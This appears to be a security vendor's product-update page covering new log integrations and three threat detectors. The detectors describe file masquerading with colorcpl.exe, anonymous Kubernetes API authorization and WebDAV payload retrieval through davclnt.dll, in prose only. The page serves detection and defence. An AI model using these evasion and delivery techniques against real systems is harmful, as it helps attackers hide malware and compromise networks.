Product updates
Data source tagging
Hunters allows you to add an additional information layer to your connected data flows by adding tags to each data flow. These tags can be used to add business context to data flows and allow you to locate and monitor the right data flows without redundant hassle.
Once data flows are tagged, you can filter leads, alerts, and stories by data source tags.
Learn more about data source tagging.
New column in Detector export file
We’ve enhanced the CSV file of the exported detector settings. Now, when exporting detector settings from the Detectors page, the CSV file will include a MITRE Technique ID column which will allow you to track the detectors’ MITRE Technique coverage based on the Technique ID in addition to the existing Technique name.
Integrations
VMWare NSX Avi Logs
A self-service Multi-Cloud Application Services Platform that ensures consistent application delivery, bringing software load balancers, web application firewall (WAF), and container Ingress for applications across data centers and clouds.
The new integration includes:
- Ingestion of the data to the data lake
- Mapping of the data to the Hunters Web Requests schema
- Mapping of the data to IOC Search
Learn more here
Axis Security
Axis Atmos Cloud securely connects any user to any business application or resource, via a centrally managed service. Axis audit logs contain various actions made by users, such as ZTNA logs, DNS Requests, SWG events, IPSEC Filtering, etc.
The new integration includes:
- Ingestion of the data to the data lake
- Mapping of the data to the Hunters DNS and Web Requests schemas
- Mapping of the data to IOC Search
Learn more here
Netography
Netography is a cloud-native Network Defense Platform (NDP) that provides real-time detection and response to anomalies and threats across hybrid, multi-cloud, and on-prem networks from a single console without deploying sensors, agents, or taps.
The new integration includes:
- Ingestion of the data to the data source
- Generating a 3rd party alert over the data
- Mapping of the data to IOC Search
Learn more here
Cisco ISE
Cisco Identity Services Engine (ISE) is an identity-based network access control and policy enforcement system. It functions as a common policy engine that enables endpoint access control and network device administration for enterprises.
The new integration includes:
- Ingestion of the data to the data lake
- Mapping of the data to the Hunters login schema
- Mapping of the data to IOC Search
Learn more here
SilverPeak
SilverPeak's Unity EdgeConnect Portfolio creates a SD-WAN fabric that is used to provide secure connectivity with private line performance interconnecting enterprise locations with public clouds, private clouds, and service provider-hosted services.
The new integration includes:
- Ingestion of the data from S3 to the data lake
- Mapping of the data to the Hunters Network Schema
- Mapping of the data to IOC Search
Learn more here
SentinelOne Custom Rules
Hunters’ SentinelOne integration offering now includes Custom Rule Alerts which include all alerts raised from custom rules.
The new integration includes:
- Ingestion of the data to the data lake
- Mapping of the data to IOC Search
- Generating a 3rd party alert over the data
Learn more here
Island
Island Browser is a Chromium-based enterprise browser designed to enhance corporate security and IT governance. It enables enterprises to control and monitor how users interact with web applications, focusing on preventing data leakage and enforcing security policies.
This integration includes:
- Ingestion of 3 data types into the data lake
- Mapping Island timeline logs to IOC Search
Learn more here
Detection
New Detectors
🔎 Masquerading of file directory using colorcpl.exe
Detector ID: edr_directory_masquerading_using_colorcpl
The colorcpl.exe executable is a command-line utility that launches the Windows Color Management interface. It operates simply by opening the interface when no parameters are specified. However, when a file parameter is provided, colorcpl.exe copies the file to the c:\windows\system32\spool\drivers\color directory. This feature might be exploited to conceal files and bypass security measures by executing files from unconventional locations.
This new detector aims to detect suspicious utilization of colorcpl.exe, which includes unexpected file parameters such as executables and scripts. Based on Axon research, colorcpl.exe binary is usually executed without target file parameters, except Icon files, such as icc, icm, cdm, gmmp.
🔎 Authorization of Kubernetes API request by an unauthenticated user
Detector ID: k8s_anonymous_authorized_request
Authorization of Kubernetes API Requests initiated by unauthenticated users should be generally restricted to specific internal usage of Kubernetes (e.g. livez, healthz, readyz). An allowed request by an unauthenticated user (i.e. system:anonymous) for a different usage might indicate a malicious activity abusing permissions’ misconfiguration.
This new detector detects authorization of Kubernetes API Requests initiated by unauthenticated users.
In addition, we’ve created two new Kubernetes enrichments:
- Creation of RoleBinding & Role authorizing the Kubernetes API request (
k8s_allowed_request_to_rolebinding_creation) - Each Kubernetes API request is allowed based on RBAC RoleBinding / ClusterRoleBinding & Role / ClusterRole authorizing it. - Activity done by an IP Address in Kubernetes API server logs (
ip_k8s_activity) - All the requests done by an IP address in Kubernetes API server logs in the last 30 days.
Recommended investigation steps:
- Who created the RoleBinding for system:anonymous user which allowed the request?
- Is the user agent suspicious or anomalous?
- What other Kubernetes API requests the initiating IP do before and after the request?
🔎 Potential WebDAV Client DLL Payload Retrieval
Detector ID: edr_webdav_payload_retrieval
This new detector was developed as we identified the rising trend of WebDAV usage for malware distribution. This TTP was spotted in our recent InfoStealer campaign investigation and remained undetected by some of the EDRs.
This detector is written on top of the EDR process creation schema and detects a WebDAV-hosted payload retrieval through a request initiated by the WebClient service (identified by the WebDAV Client DLL command-line, davclnt.dll) from a remote server, enforcing WebDAV by specifying @<port/SSL> in the URI. This request may be initiated either when a user is tricked into clicking a file referencing a WebDAV-hosted payload, or programmatically as part of a prior stage of the attack. Threat actors use this technique to transfer their payloads and tools to compromised environments.